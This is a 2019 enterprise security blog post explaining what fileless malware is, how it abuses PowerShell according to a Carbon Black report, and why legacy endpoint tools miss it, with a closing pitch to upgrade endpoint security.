If you were to interview the man or woman on the street and ask them to define cybersecurity, a few things might spring from their lips. “Cybersecurity stops Russian hackers” may be one given the current political climate, but another less controversial statement might be “cybersecurity stops malware.” This statement should be no surprise—from the earliest days of endpoint security, stopping malware was solutions providers’ top priority. It’s the most recognized digital threat, and perhaps the most persistent in the history of computers.
Yet, as we here at Solutions Review are fond of saying, those simple days of endpoint security are over. Identity is taking more center stage in the popular understanding of cybersecurity, and a new threat is taking malware’s place in the nightmares of IT security experts: fileless malware.
What is fileless malware? Why should your enterprise be concerned? Here’s what you need to know:
What is Fileless Malware?
Malware can refer to any sort of malicious software, but it is most commonly understood as a digital infection initiated via a downloaded file onto a victim’s server. A fileless malware attack is still malicious and often has the same goals as normal malware—steal enterprise data, disrupt business processes, take control of endpoints, conduct basic digital infiltration, etc.—but crucially does not involve downloading files of any sort.
Fileless malware instead exploits applications, software, or programs that an end-user would utilize in their day-to-day activities such as Flash Player. As a result, fileless malware is sometimes referred to as “living off the land” attacks. You can also consider it a non-malware attack, as it doesn’t truly function as a normal malware attack would.
How Does Fileless Malware Work?
Massachusetts-based endpoint security solution provider Carbon Black provides an excellent example of how fileless malware works in their recently released “Modern Bank Heists: Cyberattacks & Lateral Movement in the Financial Sector” report.
To summarize: via a phishing attack, the hacker leads the user to a malicious website which runs Flash Player and thus Powershell. Powershell is an operating system tool embedded in all Windows endpoints. Powershell runs on memory alone, and not on files. The fileless malware will then run a stealth command on Powershell, forcing it to run a script that fulfills the hacker’s malicious objectives such as stealing data. The fileless malware then closes off the connection and leaves no trace of itself behind.
Incidentally, Powershell is the most common fileless malware attack vector according to Carbon Black, constituting 89% of these attacks.
Why Should My Enterprise Be Concerned?
Carbon Black noted that fileless malware attacks now account for more than 50% of successful enterprise breaches. According to their report, 97% of their customers have experienced a fileless malware attack over the past two years. Fileless malware can allow hackers to move laterally throughout your enterprise and its endpoints undetected, granting threat actors “execution freedom” to paraphrase Carbon Black.
And there lies the rub: traditional and legacy endpoint security solutions are functionally incapable of even detecting fileless malware attacks, much less preventing them. Legacy solutions rely on signature-based detection and scans for malicious files to detect threats—neither of which are applicable to fileless malware.
Hackers have caught onto this fact, and the fact that plenty of enterprises haven’t updated their endpoint security solutions. Thus stems the proliferation of this new wave of digital threats.
What Can My Enterprise Do?
It’s time to seriously examine your enterprise’s endpoint security solution. When was the last time it was updated? When was the last time the vendor updated it?
If the answer to these questions is of a significant length, then it is time for an upgrade. Your enterprise needs to embrace a new, modern, next-generation endpoint security solution capable of detecting a fileless malware attack before it happens and prevent it.
We’re living in a very different cybersecurity world than the one of only a few years ago. If your endpoint security hasn’t kept up with the changing times, you virtually have no security at all. It’s time to embrace endpoint security innovation before your enterprise is targeted.
Don’t allow this new threat to bully your enterprise. Stand up for your employees, your customers, and yourself.
Latest posts by Ben Canner (see all)
- How Your Enterprise Can Better Secure The Endpoint - July 18, 2019
- The 11 Coolest Endpoint Security CEOs of 2019 - July 16, 2019
- Enterprise Endpoint Security FAQ - July 11, 2019